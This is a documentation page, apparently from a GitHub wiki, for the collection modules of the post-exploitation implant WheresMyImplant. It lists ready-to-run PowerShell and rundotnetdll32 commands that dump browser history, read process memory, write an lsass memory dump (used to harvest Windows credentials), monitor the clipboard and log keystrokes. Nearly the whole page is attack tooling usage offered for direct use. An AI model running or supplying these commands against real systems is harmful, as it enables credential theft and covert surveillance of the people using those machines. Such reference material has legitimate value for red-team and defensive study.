-
Notifications
You must be signed in to change notification settings - Fork 58
Collection Modules
Reads the bookmarks, favorites, and history from Internet Explorer/Edge, Firefox, and Chrome;
[WheresMyImplant.Collection]::DumpBrowserHistory()
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Collection,DumpBrowserHistory
Reads the memory of a process and looks for interesting data.
[WheresMyImplant.Collection]::ReadProcessMemory("495")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Collection,ReadProcessMemory "495"
Creates a minidump of a processes memory.
[WheresMyImplant.Collection]::MiniDump("495", "lsass.dmp")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Collection,MiniDump "495","lsass.dmp"
Monitors the clipboard for copied data.
[WheresMyImplant.Collection]::Clipboard()
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Collection,Clipboard
Monitors the for key presses.
[WheresMyImplant.Collection]::Keylogger()
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Collection,Keylogger